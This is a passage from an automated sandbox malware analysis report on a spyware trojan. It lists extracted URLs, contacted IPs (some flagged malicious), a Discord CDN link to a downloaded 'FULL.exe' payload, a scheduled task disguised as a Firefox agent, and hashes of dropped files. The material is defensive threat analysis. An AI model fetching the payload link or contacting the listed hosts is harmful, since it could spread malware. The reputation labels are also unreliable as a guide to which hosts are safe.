                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RenewDA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://tempuri.org/Entity/Id8ResponseDA6F.exe, 00000011.00000002.565633208.0000000003F96000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              https://support.google.com/chrome/?p=plugin_wmpDA6F.exe, 00000011.00000002.566852470.00000000040BB000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.567566286.0000000004468000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.552789222.0000000002963000.00000004.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDDA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTDA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://schemas.xmlsoap.org/ws/2006/02/addressingidentityDA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549862418.0000000002840000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeyDA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wsat/RollbackDA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          https://support.google.com/chrome/?p=plugin_javaDA6F.exe, 00000011.00000002.566852470.00000000040BB000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.567566286.0000000004468000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.552789222.0000000002963000.00000004.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://tempuri.org/Entity/Id22ResponsexDA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTDA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              https://cdn.discordapp.com42D0D.exe, 0000001B.00000002.564745659.00000000041B6000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.553806969.0000000002A53000.00000004.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://schemas.xmlsoap.org/ws/2004/06/addressingexDA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/trust/NonceDA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponseDA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://cdn.discordapp.com2D0D.exe, 0000001B.00000002.564896495.00000000041C6000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.554234581.0000000002BAE000.00000004.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://support.google.com/chrome/?p=plugin_divx2D0D.exe, 0000001B.00000002.567566286.0000000004468000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.554783778.0000000002C72000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.552789222.0000000002963000.00000004.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://tempuri.org/Entity/Id13ResponseDA6F.exe, 00000011.00000002.565633208.0000000003F96000.00000004.00000001.sdmp, DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdDA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentifDA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/CommittedDA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/security/sc/sctDA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgementDA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCTDA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoDA6F.exe, 00000011.00000002.564895445.0000000003F21000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.565407928.000000000420D000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.553519488.0000000002A0F000.00000004.00000001.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousDA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://tempuri.org/Entity/Id19ResponsePp2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                unknown
                                                                                                                                                                http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_WrapDA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2002/12/policyDA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://tempuri.org/Entity/Id22ResponseDA6F.exe, 00000011.00000002.565633208.0000000003F96000.00000004.00000001.sdmp, DA6F.exe, 00000011.00000002.565184895.0000000003F37000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpfalse
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    https://cdn.discordapp.com/attachments/688809529202442354/908412484648591370/FULL.exe2D0D.exe, 0000001B.00000002.563047294.0000000004032000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.564745659.00000000041B6000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchDA6F.exe, 00000011.00000002.564895445.0000000003F21000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.565407928.000000000420D000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.553519488.0000000002A0F000.00000004.00000001.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/IssueDA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextDA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/IssueDA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://get.adobDA6F.exe, 00000011.00000002.566852470.00000000040BB000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.567566286.0000000004468000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.554783778.0000000002C72000.00000004.00000001.sdmpfalse
                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                              unknown
                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/spnegoDA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/scDA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://tempuri.org/Entity/Id18ResponseDA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpfalse
                                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                                  unknown
                                                                                                                                                                                  http://service.real.com/realplayer/security/02062012_player/en/DA6F.exe, 00000011.00000002.566852470.00000000040BB000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.567566286.0000000004468000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.552789222.0000000002963000.00000004.00000001.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://duckduckgo.com/chrome_newtabPp2D0D.exe, 0000001B.00000002.578332462.0000000005242000.00000004.00000001.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsdDA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://tempuri.org/Entity/Id3Response2D0D.exe, 0000001B.00000002.563047294.0000000004032000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpfalse
                                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                                        unknown
                                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/rmDA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceDA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            http://schemas.xmlsoap.org/soap/actor/nextDA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=DA6F.exe, 00000011.00000002.564895445.0000000003F21000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.565407928.000000000420D000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.553519488.0000000002A0F000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                http://service.rDA6F.exe, 00000011.00000002.566852470.00000000040BB000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.567566286.0000000004468000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.552789222.0000000002963000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinaryDA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  http://tempuri.org/Entity/Id9DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                                                  unknown

                                                                                                                                                                                                  Contacted IPs

                                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                                                                  Public

                                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                  162.159.130.233
                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                  45.87.154.2
                                                                                                                                                                                                  unknownRussian Federation
                                                                                                                                                                                                  12494ASN-POSTLTDRUtrue
                                                                                                                                                                                                  45.9.20.149
                                                                                                                                                                                                  unknownRussian Federation
                                                                                                                                                                                                  35913DEDIPATH-LLCUSfalse
                                                                                                                                                                                                  188.225.85.124
                                                                                                                                                                                                  privacytoolzforyou-7000.topRussian Federation
                                                                                                                                                                                                  9123TIMEWEB-ASRUfalse
                                                                                                                                                                                                  216.128.137.31
                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                  20473AS-CHOOPAUStrue
                                                                                                                                                                                                  162.159.135.233
                                                                                                                                                                                                  cdn.discordapp.comUnited States
                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                  93.115.20.139
                                                                                                                                                                                                  unknownRomania
                                                                                                                                                                                                  202448MVPShttpswwwmvpsnetEUfalse

                                                                                                                                                                                                  Private

                                                                                                                                                                                                  IP
                                                                                                                                                                                                  192.168.2.1

                                                                                                                                                                                                  General Information

                                                                                                                                                                                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                                                                  Analysis ID:524289
                                                                                                                                                                                                  Start date:18.11.2021
                                                                                                                                                                                                  Start time:10:28:13
                                                                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                                                                  Overall analysis duration:0h 15m 35s
                                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                                  Report type:light
                                                                                                                                                                                                  Sample file name:X5lLjSzDd8.exe
                                                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                                                  Number of analysed new started processes analysed:32
                                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                                  Number of injected processes analysed:1
                                                                                                                                                                                                  Technologies:
                                                                                                                                                                                                  • HCA enabled
                                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                                  • HDC enabled
                                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@23/9@53/8
                                                                                                                                                                                                  EGA Information:Failed
                                                                                                                                                                                                  HDC Information:
                                                                                                                                                                                                  • Successful, ratio: 69.5% (good quality ratio 60.3%)
                                                                                                                                                                                                  • Quality average: 57.3%
                                                                                                                                                                                                  • Quality standard deviation: 33.1%
                                                                                                                                                                                                  HCA Information:Failed
                                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                                  • Adjust boot time
                                                                                                                                                                                                  • Enable AMSI
                                                                                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                                                                                  Warnings:
                                                                                                                                                                                                  Show All
                                                                                                                                                                                                  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                                                                                  • HTTP Packets have been reduced
                                                                                                                                                                                                  • TCP Packets have been reduced to 100
                                                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                  • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                                                                                                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                                                  Simulations

                                                                                                                                                                                                  Behavior and APIs

                                                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                                                  10:30:09Task SchedulerRun new task: Firefox Default Browser Agent 687A07C769389B07 path: C:\Users\user\AppData\Roaming\rfudbri

                                                                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                                                                  IPs

                                                                                                                                                                                                  No context

                                                                                                                                                                                                  Domains

                                                                                                                                                                                                  No context

                                                                                                                                                                                                  ASN

                                                                                                                                                                                                  No context

                                                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                                                  No context

                                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                                  No context

                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\FB48.exe.log
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\FB48.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2701
                                                                                                                                                                                                  Entropy (8bit):5.354233613626546
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:MxHKEYHKGD8AoPtHTG1hAHKKPifHKWp/BHKdHKAHKmTH1LHV1qHGiD0HKeGqHpH3:iqEYqGgAoPtzG1eqKPeq2qdqAqqVL1wQ
                                                                                                                                                                                                  MD5:B9FF048DBE7E276E64420B2644D3D173
                                                                                                                                                                                                  SHA1:C32739040524A4E0B380E59F9FF93394BC9DE983
                                                                                                                                                                                                  SHA-256:CCD22F3E8B7FB1EFCC5597B7417C66A57A60BF72E27414B3DDA9271D03D7FD81
                                                                                                                                                                                                  SHA-512:107B5BDE645CE442D2F4DCA43470E7AC90EDB267CB4514637558EF078A4860B9890BFD8021422A6E175509F340A3C258438ADAC6BF321B416BADE3CB6D8504FD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\e82398e9ff6885d617e4b97e31fb4f02\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\f2e3165e3c718b7ac302fea40614c984\System.Xml.ni.dll",0..3,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Service
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\E8E7.exe.log
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\E8E7.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):700
                                                                                                                                                                                                  Entropy (8bit):5.346524082657112
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhat/DLI4M/DLI4M0kvoDLIw:ML9E4Ks2wKDE4KhK3VZ9pKhgLE4qE4jv
                                                                                                                                                                                                  MD5:65CF801545098D915A06D8318D296A01
                                                                                                                                                                                                  SHA1:456149D5142C75C4CF74D4A11FF400F68315EBD0
                                                                                                                                                                                                  SHA-256:32E502D76DBE4F89AEE586A740F8D1CBC112AA4A14D43B9914C785550CCA130F
                                                                                                                                                                                                  SHA-512:4D1FF469B62EB5C917053418745CCE4280052BAEF9371CAFA5DA13140A16A7DE949DD1581395FF838A790FFEBF85C6FC969A93CC5FF2EEAB8C6C4A9B4F1D552D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\2D0D.exe
                                                                                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
